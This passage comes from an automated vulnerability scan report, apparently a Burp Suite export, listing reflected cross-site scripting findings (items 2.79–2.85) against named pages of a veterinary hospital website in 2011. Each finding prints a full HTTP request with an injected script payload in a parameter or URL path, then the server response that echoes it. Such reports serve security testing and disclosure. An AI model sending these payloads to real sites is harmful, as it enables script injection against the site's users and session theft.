GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:25 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r8ti6pm5ktq8n70m0nl6japfn5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3da040b"><script>alert(1)</script>f73da84759e&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.79. http://www.vcahospitals.com/main/offer/ [useragent parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de3a3"><script>alert(1)</script>7d71969fe0c was submitted in the useragent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:30 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=hmp8degbpu0a9te26g939re5u0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)de3a3"><script>alert(1)</script>7d71969fe0c&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.80. http://www.vcahospitals.com/main/offer/ [variant parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e180"><script>alert(1)</script>28aed0a1907 was submitted in the variant parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=uonisgvh1t257tmgqd61oiinl5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
IE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=1e180"><script>alert(1)</script>28aed0a1907&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.81. http://www.vcahospitals.com/main/offer/ [zip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/

Issue detail

The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a500"><script>alert(1)</script>61d16eaa101 was submitted in the zip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=A4D7F565-26BF-43EE-BC55-5C9A0223858F&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dB195437C-383C-4662-A7E6-660604A74096%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252fthank-you.html%253f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3de6e484fe2fcc9bde4e2bc7b103257d23%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&state=&submit=Get+FREE+Coupon&token=85b87f93a1fb171a2c0d27f6b230c5fd&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%2f%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3dC076635C-7A84-49B0-8786-FD89A1026CF5%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3d0715c7e3a8b4eb7e7fdaa7694658de2c%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%252f%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dB195437C-383C-4662-A7E6-660604A74096%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252fthank-you.html%25253f%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253de6e484fe2fcc9bde4e2bc7b103257d23%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25252f%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:40 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=lcvbtovbqbfupdtekad2l559v5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 19845

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=9a500"><script>alert(1)</script>61d16eaa101" method="POST" name="offer-form" id="offer-form" class="input-form">
...[SNIP]...

2.82. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ebe76"><script>alert(1)</script>5ff898b7043 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=917e022cccb7f727295d2ccceeb0579c&tollfree=866-825-8416&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:58 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15209

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.htmlebe76"><script>alert(1)</script>5ff898b7043?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=2505B0C6-B6AA-4144-878F-54873D353284&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&stat
...[SNIP]...

2.83. http://www.vcahospitals.com/main/offer/thank-you.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /main/offer/thank-you.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 754ff"><script>alert(1)</script>e83ec5aaa248053f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=http%3a%2f%2fwww.vcahospitals.com%2fmain%2foffer&ipaddress=173.193.214.243&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&formtype=CORP&newmex=0&date=1307084400&tollfree=866-825-8416 HTTP/1.1
Referer: http://www.vcahospitals.com/main/offer
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.vcahospitals.com
Cookie: PHPSESSID=1af1jedp03fokmt067uielfdf6
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:22:50 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 15197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="uri" id="uri" value="http://www.vcahospitals.com/main/offer/thank-you.html754ff"><script>alert(1)</script>e83ec5aaa248053f6?fname=&lname=&addr=&city=&state=AK&zip=&phone=&email=&optin=on&pettype=&other=&petname=&petage=&variant=&token=917e022cccb7f727295d2ccceeb0579c&guid=2505B0C6-B6AA-4144-878F-54873D353284&referer=&uri=h
...[SNIP]...

2.84. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4f764"><a>39ac731bfc3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /manhattan-veterinary-group/appt.html4f764"><a>39ac731bfc3 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=107294085.1299327741.1.3.utmcsr=google|utmgclid=CNrfoemwt6cCFcbd4Aod8keVAw|utmccn=e13geotarget_e13branded|utmcmd=ppc|utmctr=vca%20antech; PHPSESSID=ftfoo7b6iv57j362dn8bjlodp6; __utma=107294085.1677130218.1299326665.1299326665.1299326665.1; __utmc=107294085; __utmb=107294085.7.10.1299326665

Response

HTTP/1.1 404 Not Found
Date: Sat, 05 Mar 2011 12:46:42 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 Not Found
Content-Type: text/html
Content-Length: 9698

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<body id="appt4f764"><a>39ac731bfc3">
...[SNIP]...

2.85. http://www.vcahospitals.com/manhattan-veterinary-group/appt.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /manhattan-veterinary-group/appt.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c5c9"><script>alert(1)</script>49734066e86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /manhattan-veterinary-group/appt.html?7c5c9"><script>alert(1)</script>49734066e86=1 HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
